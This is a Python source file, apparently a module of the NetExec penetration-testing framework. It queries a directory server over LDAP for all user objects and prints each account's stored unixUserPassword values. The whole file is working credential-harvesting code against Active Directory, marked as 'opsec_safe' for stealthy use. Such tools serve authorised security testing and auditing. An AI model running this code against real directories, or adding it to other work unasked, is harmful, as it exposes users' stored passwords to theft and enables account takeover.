NetExec/nxc/modules/get-unixUserPassword.py

from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
from nxc.logger import nxc_logger


class NXCModule:
    """
    Get unixUserPassword attribute from all users in ldap
    Module by @SyzikSecu
    """

    name = "get-unixUserPassword"
    description = "Get unixUserPassword attribute from all users in ldap"
    supported_protocols = ["ldap"]
    opsec_safe = True
    multiple_hosts = True

    def options(self, context, module_options):
        """
        """

    def on_login(self, context, connection):
        searchFilter = "(objectclass=user)"

        try:
            context.log.debug(f"Search Filter={searchFilter}")
            resp = connection.ldapConnection.search(
                searchFilter=searchFilter,
                attributes=["sAMAccountName", "unixUserPassword"],
                sizeLimit=0,
            )
        except ldap_impacket.LDAPSearchError as e:
            if e.getErrorString().find("sizeLimitExceeded") >= 0:
                context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
                resp = e.getAnswers()
            else:
                nxc_logger.debug(e)
                return False

        answers = []
        context.log.debug(f"Total of records returned {len(resp)}")
        for item in resp:
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            sAMAccountName = ""
            unixUserPassword = []
            try:
                for attribute in item["attributes"]:
                    if str(attribute["type"]) == "sAMAccountName":
                        sAMAccountName = str(attribute["vals"][0])
                    elif str(attribute["type"]) == "unixUserPassword":
                        unixUserPassword = [str(i) for i in attribute["vals"]]
                if sAMAccountName != "" and len(unixUserPassword) > 0:
                    answers.append([sAMAccountName, unixUserPassword])
            except Exception as e:
                context.log.debug("Exception:", exc_info=True)
                context.log.debug(f"Skipping item, cannot process due to error {e!s}")
        if len(answers) > 0:
            context.log.success("Found following users: ")
            for answer in answers:
                context.log.highlight(f"User: {answer[0]} unixUserPassword: {answer[1]}")
        else:
            context.log.fail("No unixUserPassword Found")